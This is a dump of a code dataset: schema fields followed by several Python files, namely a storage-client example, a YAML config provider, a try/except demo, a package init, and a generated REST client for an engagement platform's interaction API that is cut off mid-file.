hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
7180d60a81068e83c7cc3f9f972e58ae0d70afda
1,297
py
Python
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
14
2018-12-07T18:30:27.000Z
2022-02-22T09:12:33.000Z
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
28
2019-09-17T21:03:52.000Z
2022-03-29T22:07:35.000Z
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
15
2020-06-11T15:50:08.000Z
2022-03-21T09:27:25.000Z
# list access policies for object store users res = client.get_object_store_access_policies_object_store_users() print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list access policies for specific user res = client.get_object_store_access_policies_object_store_users(member_names=["acc1/myobjuser"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list access policies for specific user by id res = client.get_object_store_access_policies_object_store_users(member_ids=["10314f42-020d-7080-8013-000ddt400090"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list only users with full access res = client.get_object_store_access_policies_object_store_users(policy_names=["pure:policy/full-access"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list only users with a specific policy by id res = client.get_object_store_access_policies_object_store_users(policy_ids=["10314f42-020d-7080-8013-000ddt400012"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # Other valid fields: continuation_token, filter, limit, offset, sort # See section "Common Fields" for examples
46.321429
117
0.801079
185
1,297
5.4
0.275676
0.121121
0.096096
0.09009
0.783784
0.737738
0.737738
0.737738
0.737738
0.737738
0
0.046809
0.094063
1,297
27
118
48.037037
0.803404
0.242097
0
0.75
0
0
0.111795
0.097436
0
0
0
0
0
1
0
false
0
0
0
0
0.5
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
7
719c40812973132a2073277bb050f2cd9a991f71
4,623
py
Python
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
import os import typing import yaml from ..config.providers import ConfigProvider from ..credentials.providers import CredentialProvider class YamlConfigProvider(ConfigProvider): """Config provider for YAML""" provider_code = "yaml" def __init__(self, yaml_path: str = "./data.yaml", default_separator: str = "."): """ :param yaml_path: path to yaml file :param default_separator: default value separator for path-mode """ self._yaml = yaml.safe_load(open(os.path.abspath(yaml_path))) self.separator = default_separator def _get_by_path(self, path: str, separator: str) -> typing.Any: """Retrieve value from a dictionary using a list of keys. :param path: string with separated keys """ dict_local = self._yaml.copy() keys = path.split(separator) for key in keys: try: dict_local = dict_local[int(key)] if key.isdigit() else dict_local[key] except Exception: if key not in dict_local: return None dict_local = dict_local[key] return dict_local def _get_by_key(self, key: str) -> typing.Any: """Retrieve value from a dictionary using a key. 
:param key: key from json """ if key in self._yaml: return self._yaml[key] else: return None def get(self, key: str, path_mode: bool = False, separator: str = None) -> typing.Optional[typing.Any]: """Get value from json :param key: key or path for search :param path_mode: boolean mode switcher :param separator: separator for path keys in path mode """ separator = separator if separator else self.separator if path_mode: return self._get_by_path(key, separator=separator) return self._get_by_key(key) def keys(self, path_mode: bool = False, separator: str = None) -> typing.List[str]: """Keys in json :param path_mode: [future] path mode for keys list :param separator: [future] separators for keys in path mode """ # TODO: implemented path-mode for keys list if not path_mode: return self._yaml.keys() else: raise NotImplementedError("Path-mode not implemented!") class YamlCredentialProvider(CredentialProvider): """Credential provider for YAML""" provider_code = "yaml" def __init__(self, yaml_path: str = "./data.yaml", default_separator: str = "."): """ :param yaml_path: path to yaml file :param default_separator: default value separator for path-mode """ self._yaml = yaml.safe_load(open(os.path.abspath(yaml_path))) self.separator = default_separator def _get_by_path(self, path: str, separator: str) -> typing.Any: """Retrieve value from a dictionary using a list of keys. :param path: string with separated keys """ dict_local = self._yaml.copy() keys = path.split(separator) for key in keys: try: dict_local = dict_local[int(key)] if key.isdigit() else dict_local[key] except Exception: if key not in dict_local: return None dict_local = dict_local[key] return dict_local def _get_by_key(self, key: str) -> typing.Any: """Retrieve value from a dictionary using a key. 
:param key: key from yaml """ if key in self._yaml: return self._yaml[key] else: return None def get(self, key: str, path_mode: bool = False, separator: str = None) -> typing.Optional[typing.Any]: """Get value from json :param key: key or path for search :param path_mode: boolean mode switcher :param separator: separator for path keys in path mode """ separator = separator if separator else self.separator if path_mode: return self._get_by_path(key, separator=separator) return self._get_by_key(key) def keys(self, path_mode: bool = False, separator: str = None) -> typing.List[str]: """Keys in json :param path_mode: [future] path mode for keys list :param separator: [future] separators for keys in path mode """ # TODO: implemented path-mode for keys list if not path_mode: return self._yaml.keys() else: raise NotImplementedError("Path-mode not implemented!")
29.634615
107
0.605884
576
4,623
4.713542
0.133681
0.070718
0.023573
0.029466
0.917864
0.917864
0.917864
0.917864
0.917864
0.917864
0
0
0.304564
4,623
155
108
29.825806
0.844479
0.265628
0
0.895522
0
0
0.027141
0
0
0
0
0.012903
0
1
0.149254
false
0
0.074627
0
0.492537
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
8
719ebad60df6378ab586809b08c677b3eb620efb
264
py
Python
Python/Fluent_Python/chapter5/section15/else_statument.py
sunyunxian/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
1
2021-12-17T14:57:30.000Z
2021-12-17T14:57:30.000Z
Python/Fluent_Python/chapter5/section15/else_statument.py
ok-frank/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
null
null
null
Python/Fluent_Python/chapter5/section15/else_statument.py
ok-frank/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
null
null
null
try: print('No exception') except: print('Has exception') else: print('No exception, then do this') try: raise KeyError print('No exception') except: print('Has exception') else: print('No exception, then do this, else not do this')
15.529412
57
0.643939
36
264
4.722222
0.361111
0.164706
0.376471
0.258824
0.811765
0.811765
0.811765
0.811765
0.811765
0.811765
0
0
0.231061
264
16
58
16.5
0.837438
0
0
0.769231
0
0
0.458015
0
0
0
0
0
0
1
0
true
0
0
0
0
0.461538
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
11
71a2256c4d0b640e9ab968c0661d77c55ce4ccd6
135
py
Python
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
109
2016-06-05T21:51:53.000Z
2021-09-06T07:00:26.000Z
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
6
2016-06-06T01:05:40.000Z
2016-09-19T19:30:49.000Z
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
13
2016-06-06T14:15:31.000Z
2019-11-04T23:33:56.000Z
#import layers_patch import tensorflow_patch import summaries_patch import layers_patch import rnn_utilities_patch import custom_patch
19.285714
26
0.903704
19
135
6.052632
0.421053
0.478261
0.295652
0.4
0
0
0
0
0
0
0
0
0.088889
135
6
27
22.5
0.934959
0.140741
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
71d73d74c09b8d200063b44afa2b3b9151dfd65a
263,198
py
Python
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 """ iEngage 2.0 API This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers. OpenAPI spec version: 2.0 Generated by: https://github.com/swagger-api/swagger-codegen.git Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class InteractionApi(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def add_interaction(self, requester_id, client_token, **kwargs): """ Share interaction without attachment This service allows a user to post an interaction. The following fields(key:value) are required to be present in the Interaction JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionTitle This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionInputModel body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_interaction_with_http_info(requester_id, client_token, **kwargs) else: (data) = self.add_interaction_with_http_info(requester_id, client_token, **kwargs) return data def add_interaction_with_http_info(self, requester_id, client_token, **kwargs): """ Share interaction without attachment This service allows a user to post an interaction. The following fields(key:value) are required to be present in the Interaction JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionTitle This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_with_http_info(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. 
(required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionInputModel body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_interaction`") resource_path = '/interactions'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 
'application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_interaction_0(self, interaction_title, file, requester_id, client_token, **kwargs): """ Share interaction with attachment Allows the user to share interaction with attachment. Returns the interaction object This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_0(interaction_title, file, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_title: interactionTitle (required) :param file file: file (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_id: categoryId :param str interaction_type: interactionType :param str interaction_description: interactionDescription :param str association: association :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, **kwargs) else: (data) = self.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, **kwargs) return data def add_interaction_0_with_http_info(self, interaction_title, file, requester_id, client_token, **kwargs): """ Share interaction with attachment Allows the user to share interaction with attachment. Returns the interaction object This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_title: interactionTitle (required) :param file file: file (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_id: categoryId :param str interaction_type: interactionType :param str interaction_description: interactionDescription :param str association: association :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_title', 'file', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'interaction_description', 'association', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_interaction_0" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_title' is set if ('interaction_title' not in params) or (params['interaction_title'] is None): raise ValueError("Missing the required parameter `interaction_title` when calling `add_interaction_0`") # verify the required parameter 'file' is set if ('file' not in params) or (params['file'] is None): raise ValueError("Missing the required parameter `file` when calling `add_interaction_0`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_interaction_0`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_interaction_0`") resource_path = '/interactions/attachment'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'category_id' in params: form_params.append(('categoryId', params['category_id'])) if 'interaction_type' in params: form_params.append(('interactionType', params['interaction_type'])) if 'interaction_title' in params: 
form_params.append(('interactionTitle', params['interaction_title'])) if 'interaction_description' in params: form_params.append(('interactionDescription', params['interaction_description'])) if 'association' in params: form_params.append(('association', params['association'])) if 'file' in params: local_var_files['file'] = params['file'] body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['multipart/form-data']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_response(self, interaction_id, requester_id, client_token, **kwargs): """ Response the specified interaction This service allows a user to post a response on an interaction. The following fields(key:value) are required to be present in the Response JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionId (Path Parameter) 2. responseDescription This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
(optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionResponse body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_response_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.add_response_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def add_response_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Response the specified interaction This service allows a user to post a response on an interaction. The following fields(key:value) are required to be present in the Response JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionId (Path Parameter) 2. responseDescription This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionResponse body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `add_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_response`") resource_path = '/interactions/{interactionId}/responses'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header 
`Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded', 'application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_response_0(self, body, body2, logged_in_user_id, access_token, client_token, **kwargs): """ Response the specified interaction Allows the user to response the interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_0(body, body2, logged_in_user_id, access_token, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int body: interactionId (required) :param str body2: response (required) :param str logged_in_user_id: User id of logged / authenticated user (required) :param str access_token: Unique session token for user. To get access token user will have to authenticate (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str body3: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param list[Attachment] body4: :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, **kwargs) else: (data) = self.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, **kwargs) return data def add_response_0_with_http_info(self, body, body2, logged_in_user_id, access_token, client_token, **kwargs): """ Response the specified interaction Allows the user to response the interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int body: interactionId (required) :param str body2: response (required) :param str logged_in_user_id: User id of logged / authenticated user (required) :param str access_token: Unique session token for user. To get access token user will have to authenticate (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str body3: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param list[Attachment] body4: :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['body', 'body2', 'logged_in_user_id', 'access_token', 'client_token', 'body3', 'body4'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_response_0" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'body' is set if ('body' not in params) or (params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `add_response_0`") # verify the required parameter 'body2' is set if ('body2' not in params) or (params['body2'] is None): raise ValueError("Missing the required parameter `body2` when calling `add_response_0`") # verify the required parameter 'logged_in_user_id' is set if ('logged_in_user_id' not in params) or (params['logged_in_user_id'] is None): raise ValueError("Missing the required parameter `logged_in_user_id` when calling `add_response_0`") # verify the required parameter 'access_token' is set if ('access_token' not in params) or (params['access_token'] is None): raise ValueError("Missing the required parameter `access_token` when calling `add_response_0`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the 
required parameter `client_token` when calling `add_response_0`") resource_path = '/interactions/{interactionId}/responses/attachment'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'logged_in_user_id' in params: header_params['loggedInUserId'] = params['logged_in_user_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body4' in params: body_params = params['body4'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['multipart/form-data']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def change_interaction_category(self, interaction_id, category_id, requester_id, client_token, **kwargs): """ Change interaction category Allows the user to change the interaction category. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_category(interaction_id, category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
